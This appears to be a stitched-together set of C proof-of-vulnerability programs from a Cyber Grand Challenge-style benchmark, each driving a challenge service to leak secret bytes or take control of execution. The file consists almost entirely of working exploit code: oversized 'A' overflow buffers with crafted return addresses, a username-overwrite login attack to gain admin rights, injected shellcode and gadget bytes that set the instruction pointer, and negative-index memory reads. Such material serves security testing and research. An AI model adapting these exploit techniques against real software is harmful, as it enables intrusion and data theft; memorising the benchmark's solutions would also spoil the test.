int main()
{
type2_vals t2;
unsigned char buf[200];
int i;
size_t bytes;
cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00"
"ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA"
"TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140);
random(buf + 11 + 8 + 24, 12, &bytes);
random(buf + 11 + 8 + 24 + 16, 16, &bytes);
random(buf + 11 + 0x40 + 8 + 24, 12, &bytes);
random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes);
for (i = 0; i < 139; i++)
{
// make sure we didn't introduce any bad chars
if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55;
if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55;
if (buf[i] == 0x7f) buf[i] = 0x3f;
if (buf[i] == 0x7e) buf[i] = 0x3e;
}
type2_negotiate(&t2);
transmit_all(STDOUT, buf, 140);
length_read(STDIN, buf, 0x58);
length_read(STDIN, buf, 16);
// buf contains: "Album: ?????????"
// as long as buf does not contain "Arti", we have won
for (i = 7; i < 16; i++)
if (memcmp(&buf[i], "Arti", 4) == 0)
break;
if (i == 16)
{
type2_submit(buf + 7, 4);
return 0;
}
// we found "Arti", so look some more
length_read(STDIN, buf, 8);
type2_submit(buf + 4, 4);
return 0;
}
int main()
{
unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N";
char admin_name[] = {12, 34, 56, 78 };
type2_vals t2;
type2_negotiate(&t2);
int secret = 0;
unsigned char buf[200];
unsigned short msg_length = 0;
unsigned short register_user_req = 11382;
char user_name[] = { 11, 22, 33, 44 };
//Register first user (this user will have name overwritten)
transmit_all(STDOUT, ®ister_user_req, sizeof(register_user_req));
msg_length = sizeof(user_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, user_name, sizeof(user_name));
//Logout user
unsigned short logout_req = 8719;
transmit_all(STDOUT, &logout_req, sizeof(logout_req));
unsigned short login_req = 8711;
//Using the login (vulnerable) command overwrite user name of first user
transmit_all(STDOUT, &login_req, sizeof(login_req));
msg_length = sizeof(exploit) - 1;
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, exploit, sizeof(exploit) - 1);
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
//Now login as the administrator
transmit_all(STDOUT, &login_req, sizeof(login_req));
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
unsigned short remote_token_req = 7777;
unsigned short page_idx = 100;
transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req));
transmit_all(STDOUT, &page_idx, sizeof(page_idx));
unsigned short exit_server = 9999;
transmit_all(STDOUT, &exit_server, sizeof(exit_server));
length_read(STDIN, buf, 24);
length_read(STDIN, (unsigned char *)(&secret), sizeof(secret));
type2_submit((unsigned char *)(&secret), sizeof(secret));
return 0;
}
int main()
{
type2_vals t2v;
unsigned char* ScreenBuf[MAX_LINES];
unsigned LineCnt;
#ifndef DEBUG
type2_negotiate(&t2v);
#else
(void)t2v;
#endif
transmit_all(STDOUT, "l23k", 4);
send_string(STDERR, "GOING\n");
LineCnt = ReadScreen(ScreenBuf);
for (unsigned Index = 0; Index < 64; ++Index)
{
send_string(STDERR, "LOOP\n");
send_string(STDOUT, "0\n");
LineCnt = ReadScreen(ScreenBuf);
}
send_string(STDOUT, "shuf\n");
LineCnt = ReadScreen(ScreenBuf);
send_string(STDOUT, "4986\n");
LineCnt = ReadScreen(ScreenBuf);
send_string(STDOUT, "4\n");
LineCnt = ReadScreen(ScreenBuf);
send_string(STDOUT, "dupr\n");
LineCnt = ReadScreen(ScreenBuf);
char* s = (char *)ScreenBuf[LineCnt - 2];
s = strchr(s, ':');
s += 2;
int m = strtol(s, NULL, 10);
unsigned char secret[4];
cgc_memcpy(secret, (void *)&m, 4);
secret[0] ^= 0x14;
secret[1] ^= 0x15;
secret[2] ^= 0x16;
secret[3] ^= 0x17;
send_string(STDERR, (char *)s);
send_string(STDERR, "----->\n");
type2_submit((unsigned char *)secret, 4);
send_string(STDOUT, "quit\n");
}
int
main(void)
{
unsigned int i;
unsigned char flag[4] = {0, 0, 0, 0};
negotiate_type2();
for (i = 0; i < sizeof(flag); i++)
flag[i] = get_byte(i);
type2_submit(flag, sizeof(flag));
transmit_all(STDOUT, "quit\n", sizeof("quit\n") - 1);
return 0;
}
int main(void) {
// negotiate
type2_vals t2vals;
type2_negotiate(&t2vals);
// perform POV
char input[11];
ReceiveFromCB(input, 10);
char bytes[55] = "ish hostname +p password +l username dump 1128775680 \n";
//print_integer(bytes + 42, t2vals.region_addr);
SendToCB(bytes, cgc_strlen(bytes));
unsigned int i = 0xffffffff;
SendToCB("quit\n", 5);
ReceiveFromCB((char *)&i, 4);
type2_submit((unsigned char *)&i, 4);
return 0;
}
int main(int cgc_argc, char *cgc_argv[])
{
unsigned char buf[128];
type1_vals t1;
cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1);
t1.ipval |= 0x91000000;
t1.regval |= 0x91000000;
#if 0
unsigned char data[4];
type2_vals t2;
type2_negotiate(&t2);
/* ... */
type2_submit(data, 4);
#endif
// query
*(unsigned int *)&buf[0] = 36 + 39;
*(unsigned int *)&buf[4] = 0x367bae4d;
// exe
*(unsigned int *)&buf[8] = 0x4E269472;
*(unsigned int *)&buf[12] = 0x2000;
*(unsigned int *)&buf[16] = 0x2000;
*(unsigned int *)&buf[20] = 39;
*(unsigned int *)&buf[24] = 0x2020;
*(unsigned int *)&buf[28] = 0;
*(unsigned int *)&buf[32] = 0x2020;
*(unsigned int *)&buf[36] = 0;
// gadget (0x90000101): pop ebx, pop ebp, ret
cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39);
// set ip and ebp
*(unsigned int *)&buf[49] = t1.ipval;
*(unsigned int *)&buf[60] = t1.regval;
cgc_transmit_all(STDOUT, buf, 40 + 39);
cgc_length_read(STDIN, buf, 4);
return 0;
}
int main(void)
{
#ifndef DEBUG
xlat_seed("9an538n9av3;5");
#endif
char buf[1024];
int secrets = 0x4347c010;
const char* reg = "charlie" EOT_S;
const char* sub_self = "s" EOT_S "charlie" EOT_S;
const char* start_blub = "b" EOT_S;
const char* read_blubs = "r" EOT_S;
length_read(0, (unsigned char*)buf, 0x4);
#ifndef TESTING
unsigned char data[4];
type2_vals t2;
type2_negotiate(&t2);
#endif
send_string(1, reg);
length_read(0, (unsigned char*)buf, 0x4);
send_string(1, sub_self);
send_string(1, start_blub);
send_string(1, "adf");
transmit_all(1, &secrets, sizeof(secrets));
send_string(1, EOT_S);
send_string(1, read_blubs);
length_read(0, (unsigned char*)buf, 0x30);
length_read(0, (unsigned char*)buf, 0x4);
#ifndef DEBUG
size_t client_0_data = 0xb7e004f8;
#else
size_t client_0_data = 0xb7e000b8;
#endif
size_t secret_addr = (*(size_t*)buf) + 44;
int diff = secret_addr - client_0_data;
diff /= 4;
int idx = (2 << 29) - diff;
_convert_signed(buf, -idx, 10, 0);
char tosend[1024];
strcat(tosend, "y");
strcat(tosend, EOT_S);
strcat(tosend, "charlie");
strcat(tosend, EOT_S);
strcat(tosend, buf);
strcat(tosend, EOT_S);
send_string(1, tosend);
send_string(1, read_blubs);
const char* cgc_exit = "e" EOT_S;
send_string(1, cgc_exit);
#ifndef TESTING
length_read(0, (unsigned char*)buf, 336);
length_read(0, data, 4);
type2_submit(data, 4);
#endif
return 0;
}
int play_hi_lo(int scored_game)
{
unsigned char len_resp[128];
unsigned int resp_len = 0;
unsigned char *resp = NULL;
char *guess_msg = malloc(128);
char *guess_buf = malloc(128);
char *select_guess_num_game = "2\n";
char *pov_guess_num = "-1\n";
char *normal_guess_num = "0\n";
int num_guesses = 33;
int guess_lower = -2147483647;
int guess_upper = 2147483647;
int guess = 0;
int won = 0;
if (scored_game) {
pov_guess_num = normal_guess_num;
num_guesses = 16;
guess_upper = 0xffff;
guess_lower = 0;
guess = (guess_upper - guess_lower) / 2;
}
read_until_game_prompt();
length_read(STDIN, len_resp, cgc_strlen("Game # "));
transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game));
length_read(STDIN, len_resp, cgc_strlen("Enter max value (Default=65535): "));
transmit_all(STDOUT, pov_guess_num, cgc_strlen(pov_guess_num));
if (!scored_game) {
length_read(STDIN, len_resp, 1);
if (len_resp[0] == 'E') {
length_read(STDIN, len_resp, cgc_strlen("nter max value (Default=65535): "));
transmit_all(STDOUT, normal_guess_num, cgc_strlen(normal_guess_num));
num_guesses = 16;
guess_upper = 0xffff;
guess_lower = 0;
guess = (guess_upper - guess_lower) / 2;
} else {
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
num_guesses = 33;
}
}
while(num_guesses) {
cgc_memset(guess_buf, 0, 128);
cgc_memset(guess_msg, 0, 128);
cgc_memset(len_resp, 0, 128);
sprintf(guess_buf, "%d\n", guess);
sprintf(guess_msg, "Guess the number [%d guesses left]: ", num_guesses--);
length_read(STDIN, len_resp, cgc_strlen(guess_msg));
transmit_all(STDOUT, guess_buf, cgc_strlen(guess_buf));
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
if (memcmp(resp, "Too Low", 7) == 0) {
guess_lower = guess;
guess += (guess_upper - guess_lower) / 2;
} else if(memcmp(resp, "Too High", 8) == 0) {
guess_upper = guess;
guess -= (guess_upper - guess_lower) / 2;
} else if(memcmp(resp, "You won!", 8) == 0) {
won = 1;
break;
}
}
if (!won) {
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
if (memcmp(resp, "Sorry", 5) == 0) {
//transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit));
return 0;
}
}
//If POV
type2_submit((void *)&guess, sizeof(int));
return 1;
}
int main(void) {
negotiate_type2();
unsigned char flag[4] = {0, 0, 0, 0};
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x03\x03\x03\x03";
static unsigned int write_00000_00000_len = 4;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length cgc_read
read_00000_len = 3;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
// first 3 byte of flag come from stamp0
for (int i = 0; i < 3; i++)
flag[i] = read_00000[i];
if (read_00000_res) {} //silence unused variable warning
//**** cgc_read assign to var "stamp0" from slice
assign_from_slice("stamp0", read_00000, read_00000_len - read_00000_ptr, 0, 3, 0);
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length cgc_read
read_00001_len = 2;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00001_00000[] =
"\x04\x04";
read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 2);
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x03\x03\x03\x03";
static unsigned int write_00001_00000_len = 4;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length cgc_read
read_00002_len = 3;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
// 4th byte of flag comes from stamp1
flag[3] = read_00002[0];
if (read_00002_res) {} //silence unused variable warning
//**** cgc_read assign to var "stamp1" from slice
assign_from_slice("stamp1", read_00002, read_00002_len - read_00002_ptr, 0, 3, 0);
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length cgc_read
read_00003_len = 2;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00003_00000[] =
"\x04\x04";
read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 2);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x00\x0f\xf0\xff";
static unsigned int write_00002_00000_len = 4;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length cgc_read
read_00004_len = 2;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00004_00000[] =
"\x04\x17";
read_00004_ptr += data_match(read_00004 + read_00004_ptr, read_00004_len - read_00004_ptr, match_00004_00000, 2);
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
//*** submitting type 2 POV results
// submit_type2("flag");
type2_submit(flag, 4);
}
void fail() {
unsigned char x[4];
const unsigned char* x_addr = (unsigned char*) &x;
type2_submit(x_addr, 4);
_terminate(-1);
}
